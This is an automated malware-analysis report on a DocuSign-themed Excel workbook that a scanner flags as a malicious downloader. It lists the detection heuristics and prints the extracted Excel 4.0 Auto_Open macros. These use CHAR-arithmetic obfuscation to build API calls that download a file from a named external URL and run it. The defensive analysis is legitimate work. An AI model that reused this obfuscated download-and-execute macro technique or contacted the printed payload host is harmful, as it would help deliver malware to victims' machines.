Verdict: MALICIOUS
Risk Score: 302
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous functions like RUN and ShellExecute. This indicates the macro is designed to execute external commands. The embedded URL suggests a download or redirection to a malicious resource. The ClamAV detection further supports its malicious nature as a downloader.
Heuristics (7)
- ClamAV: Doc.Downloader.Docusign0521-9864805-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Docusign0521-9864805-0
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- URL reconstructed from XLM cell array (1 URL) (critical, OLE_XLM_CELL_ARRAY_URL): Excel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: https://moegifts.com/ds/161120.gif (referenced by macro)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt (hash b74fbb14c9dd0283fe5b35630158622cf58bbddcd03d161d30bf64d1f40271a4) | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 7889 bytes |

Preview script: first 1,000 lines of the extracted script
' 0085 16 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - DocuSig
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0085 18 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - 8
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d 8 !A50
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' 8 ,HX77,"CALL("Ke"& 8 !BX61&"32","Cr"& 8 !BX72&"yA","JCJ", DocuSig!IP362,0)",""
' 8 ,HX78,"CALL("Ke"& 8 !CC63&"32","Cr"& 8 !CC74&"yA","JCJ", DocuSig!IP362& DocuSig!IP377,0)",""
' 8 ,HX79,RUN(A205),""
' 8 ,A94,RUN(B104),""
' 8 ,B104,RUN(HX77),""
' 8 ,B200,"https://"&C201&D202&E203,""
' 8 ,A205,"CALL("U"& DocuSig!IU404,"U"& DocuSig!IU367,"IICCII",0,B200, DocuSig!IP362& DocuSig!IP377& DocuSig!IP391,0,0)",""
' 8 ,A206,"CALL( DocuSig!IT426, DocuSig!IF355,"IICCCCI",0, DocuSig!IU394, DocuSig!IP362& DocuSig!IP377& DocuSig!IP391,,0,0)",""
' 8 ,A207,HALT(),""
' 8 ,IF355,CONCATENATE(IF356&IF357&IF358&IF359&IF360&IF361&IF362&IF363&IF364&IF365&IF366&IF367&IF368),""
' 8 ,IF356,CHAR(IG356+IH356+II356),""
' 8 ,IF357,CHAR(IG357+IH357+II357),""
' 8 ,IF358,CHAR(IG358+IH358+II358),""
' 8 ,IF359,CHAR(IG359-IH359-II359),""
' 8 ,IF360,CHAR(IG360-IH360-II360),""
' 8 ,IF361,CHAR(IG361-IH361-II361),""
' 8 ,IF362,CHAR(IG362-IH362-II362),""
' 8 ,IP362,"CONCATENATE(IP363,IP364,IP365,IP366,IP367,IP368,IP369,IP370,IP371)",""
' 8 ,IF363,CHAR(IG363-IH363+II363),""
' 8 ,IP363,CHAR(IQ363+IR363+IS363),""
' 8 ,IF364,CHAR(IG364-IH364+II364),""
' 8 ,IP364,CHAR(IQ364+IR364+IS364),""
' 8 ,IF365,CHAR(IG365-IH365+II365),""
' 8 ,IP365,CHAR(IQ365+IR365+IS365),""
' 8 ,IF366,CHAR(IG366+IH366-II366),""
' 8 ,IP366,CHAR(IQ366+IR366-IS366),""
' 8 ,IF367,CHAR(IG367+IH367-II367),""
' 8 ,IP367,CHAR(IQ367+IR367-IS367),""
' 8 ,IU367,"CONCATENATE(IU369,IU370,IU371,IU372,IU373,IU374,IU375,IU376,IU377,IU378,IU379,IU380,IU381,IU382,IU383,IU384,IU385)",""
' 8 ,IF368,CHAR(IG368+IH368-II368),""
' 8 ,IP368,CHAR(IQ368+IR368-IS368),""
' 8 ,IU368,CHAR(IV368+IW368+IX368),""
' 8 ,IP369,CHAR(IQ369-IR369+IS369),""
' 8 ,IU369,CHAR(IV369+IW369+IX369),""
' 8 ,IP370,CHAR(IQ370-IR370+IS370),""
' 8 ,IU370,CHAR(IV370+IW370+IX370),""
' 8 ,IP371,CHAR(IQ371-IR371+IS371),""
' 8 ,IU371,CHAR(IV371-IW371-IX371),""
' 8 ,IU372,CHAR(IV372-IW372-IX372),""
' 8 ,IU373,CHAR(IV373-IW373-IX373),""
' 8 ,IU374,CHAR(IV374+IW374-IX374),""
' 8 ,IU375,CHAR(IV375+IW375-IX375),""
' 8 ,IU376,CHAR(IV376+IW376-IX376),""
' 8 ,IP377,"CONCATENATE(IP378,IP379,IP380,IP381,IP382,IP383,IP384)",""
' 8 ,IU377,CHAR(IV377-IW377+IX377),""
' 8 ,IP378,CHAR(IQ378-IR378-IS378),""
' 8 ,IU378,CHAR(IV378-IW378+IX378),""
' 8 ,IP379,CHAR(IQ379-IR379-IS379),""
' 8 ,IU379,CHAR(IV379-IW379+IX379),""
' 8 ,IP380,CHAR(IQ380-IR380-IS380),""
' 8 ,IU380,CHAR(IV380+IW380+IX380),""
' 8 ,IP381,CHAR(IQ381-IR381+IS381),""
' 8 ,IU381,CHAR(IV381+IW381+IX381),""
' 8 ,IP382,CHAR(IQ382-IR382+IS382),""
' 8 ,IU382,CHAR(IV382+IW382+IX382),""
' 8 ,IP383,CHAR(IQ383-IR383+IS383),""
' 8 ,IU383,CHAR(IV383-IW383-IX383),""
' 8 ,IP384,CHAR(IQ384-IR384+IS384),""
' 8 ,IU384,CHAR(IV384-IW384-IX384),""
' 8 ,IU385,CHAR(IV385-IW385-IX385),""
' 8 ,IP391,"CONCATENATE(IP392,IP393,IP394,IP395,IP396,IP397,IP398,IP399,IP400,IP401,IP402,IP403,IP404)",""
' 8 ,IP392,[],""
' 8 ,IP393,[],""
' 8 ,IP394,[],""
' 8 ,IU394,CONCATENATE(IU395&IU396&IU397&IU398),""
' 8 ,IP395,[],""
' 8 ,IU395,CHAR(IV395+IW395-IX395),""
' 8 ,IP396,[],""
' 8 ,IU396,CHAR(IV396+IW396-IX396),""
' 8 ,IP397,[],""
' 8 ,IU397,CHAR(IV397-IW397+IX397),""
' 8 ,IP398,[],""
' 8 ,IU398,CHAR(IV398-IW398+IX398),""
' 8 ,IP399,[],""
' 8 ,IP400,[],""
' 8 ,IP401,[],""
' 8 ,IP402,[],""
' 8 ,IP403,[],""
' 8 ,IP404,[],""
' 8 ,IU404,"CONCATENATE(IU406,IU407,IU408,IU409,IU410)",""
' 8 ,IU405,CHAR(IV405+IW405+IX405),""
' 8 ,IU406,CHAR(IV406+IW406+IX406),""
' 8 ,IU407,CHAR(IV407+IW407+IX407),""
' 8 ,IU408,CHAR(IV408-IW408-IX408),""
' 8 ,IU409,CHAR(IV409-IW409-IX409),""
' 8 ,IU410,CHAR(IV410-IW410-IX410),""
' 8 ,IT426,CONCATENATE(IT427&IT428&IT429&IT430&IT431&IT432&IT433),""
' 8 ,IT427,CHAR(IU427+IV427+IW427),""
' 8 ,IT428,CHAR(IU428+IV428+IW428),""
' 8 ,IT429,CHAR(IU429+IV429+IW429),""
' 8 ,IT430,CHAR(IU430+IV430+IW430),""
' 8 ,IT431,CHAR(IU431-IV431-IW431),""
' 8 ,IT432,CHAR(IU432-IV432-IW432),""
' 8 ,IT433,CHAR(IU433-IV433-IW433),""
' 8 ,BX61,CONCATENATE(BX64&BX65&BX66&BX67),""
' 8 ,CB61,"",1.00000000000000000000
' 8 ,BX62,CHAR(BY62+BZ62+CA62),""
' 8 ,BX63,CHAR(BY63+BZ63+CA63),""
' 8 ,CC63,CONCATENATE(CC66&CC67&CC68&CC69),""
' 8 ,BX64,CHAR(BY64+BZ64+CA64),""
' 8 ,CC64,CHAR(CD64+CE64+CF64),""
' 8 ,BX65,CHAR(BY65+BZ65+CA65),""
' 8 ,CC65,CHAR(CD65+CE65+CF65),""
' 8 ,BX66,CHAR(BY66-BZ66-CA66),""
' 8 ,CC66,CE66,""
' 8 ,BX67,CHAR(BY67-BZ67-CA67),""
' 8 ,CC67,CHAR(CD67+CE67+CF67),""
' 8 ,BX68,CHAR(BY68-BZ68+CA68),""
' 8 ,CC68,CHAR(CD68+CE68+CF68),""
' 8 ,BX69,CHAR(BY69-BZ69+CA69),""
' 8 ,CC69,CHAR(CD69+CE69+CF69),""
' 8 ,CC70,CHAR(CD70+CE70+CF70),""
' 8 ,CC71,CHAR(CD71+CE71+CF71),""
' 8 ,BX72,CONCATENATE(BX75&BX76&BX77&BX78&BX79&BX80&BX81&BX82&BX83&BX84&BX85&BX86),""
' 8 ,BX73,[],""
' 8 ,BX74,[],""
' 8 ,CC74,CONCATENATE(CC77&CC78&CC79&CC80&CC81&CC82&CC83&CC84&CC85&CC86&CC87&CC88),""
' 8 ,BX75,[],""
' 8 ,CC75,CHAR(CD75+CE75+CF75),""
' 8 ,BX76,[],""
' 8 ,CC76,CHAR(CD76+CE76+CF76),""
' 8 ,BX77,[],""
' 8 ,CC77,CHAR(CD77+CE77+CF77),""
' 8 ,BX78,[],""
' 8 ,CC78,CHAR(CD78+CE78+CF78),""
' 8 ,BX79,[],""
' 8 ,CC79,CHAR(CD79-CE79-CF79),""
' 8 ,BX80,[],""
' 8 ,CC80,CHAR(CD80-CE80-CF80),""
' 8 ,BX81,[],""
' 8 ,CC81,CHAR(CD81-CE81-CF81),""
' 8 ,BX82,[],""
' 8 ,CC82,CHAR(CD82-CE82-CF82),""
' 8 ,BX83,[],""
' 8 ,CC83,CHAR(CD83+CE83-CF83),""
' 8 ,BX84,[],""
' 8 ,CC84,CHAR(CD84+CE84-CF84),""
' 8 ,BX85,[],""
' 8 ,CC85,CHAR(CD85+CE85-CF85),""
' 8 ,BX86,[],""
' 8 ,CC86,CHAR(CD86+CE86-CF86),""
' 8 ,BX87,[],""
' 8 ,CC87,CHAR(CD87-CE87+CF87),""
' 8 ,BX88,[],""
' 8 ,CC88,CHAR(CD88-CE88+CF88),""
' 8 ,CC89,CHAR(CD89-CE89+CF89),""
' 8 ,CC90,CHAR(CD90-CE90+CF90),""